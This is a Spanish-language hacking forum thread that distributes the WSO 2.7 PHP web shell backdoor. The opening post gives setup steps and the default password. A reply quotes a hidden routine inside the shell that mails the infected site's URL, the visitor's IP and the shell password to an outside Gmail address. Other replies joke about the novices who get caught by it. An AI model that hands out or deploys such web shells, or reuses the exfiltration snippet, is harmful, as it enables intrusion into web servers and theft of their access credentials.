comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[PHP] WSO shell backdoor

  • 3 Respuestas
  • 3449 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado craventhegod

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • [C]raven [in]seguridad Informatica
« en: Mayo 12, 2013, 02:46:46 pm »
WSO es una php shell backdoor  que proporciona una interfaz para distintas operaciones remotas,  ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.



con pass simple                  No tienes permisos para ver links. Registrate o Entra con tu cuenta

pass con error 404                 No tienes permisos para ver links. Registrate o Entra con tu cuenta



importante cambiar la contraseña de la shell***



1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)

2. buscaremos

$auth_pass = “1846c8d1ead7d12e9f4d18db001ff079″;

 

lo remplazaremos por nuestra contraseña en MD5 y guardamos

ya que si no quieren cambiar la pass.
 la contraseña por defecto es:

hackmeDON


todo es relativo, hasta nuestra existencia :) Shalom

Desconectado S t Ø r M d ∆ r k

  • *
  • Underc0der
  • Mensajes: 74
  • Actividad:
    0%
  • Reputación 0
  • fb.com/cyberoxyde
    • Ver Perfil
    • Mi Blog
    • Email
  • Twitter: @stormdark_
« Respuesta #1 en: Mayo 12, 2013, 03:05:58 pm »
Hay que enseñarles a ofuscar código a estos juakerz

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("hardwareheaven.com@gmail.com",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
No tienes permisos para ver links. Registrate o Entra con tu cuenta
In my mind where before there was order, today there is only chaØs!

Desconectado TUNOVATO

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Julio 26, 2013, 11:37:31 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hay que enseñarles a ofuscar código a estos juakerz

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("hardwareheaven.com@gmail.com",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

este es un descarado...... ----> hardwareheaven.com@gmail.com

 ;D ;D ;D ;D ;D

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Julio 29, 2013, 10:13:33 am »
eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD
El conocimiento es libre...
La información no lo es xD

 

¿Te gustó el post? COMPARTILO!



[PHP] Worse Linux Shell

Iniciado por ANTRAX

Respuestas: 2
Vistas: 2565
Último mensaje Marzo 26, 2013, 05:40:49 pm
por Xt3mP
Reverse Shell Django

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2560
Último mensaje Octubre 01, 2014, 12:40:08 am
por hdbreaker
Fenix Shell (C99 Traducido)

Iniciado por ANTRAX

Respuestas: 13
Vistas: 7491
Último mensaje Mayo 27, 2016, 12:28:12 pm
por blackdrake
Priv Shell Scanner!

Iniciado por Mayk0

Respuestas: 0
Vistas: 2129
Último mensaje Mayo 07, 2013, 08:45:20 pm
por Mayk0
Python Web Shell WSO 0.1 - Undetectable By WAF

Iniciado por sm0ke

Respuestas: 0
Vistas: 872
Último mensaje Mayo 17, 2018, 01:54:19 am
por sm0ke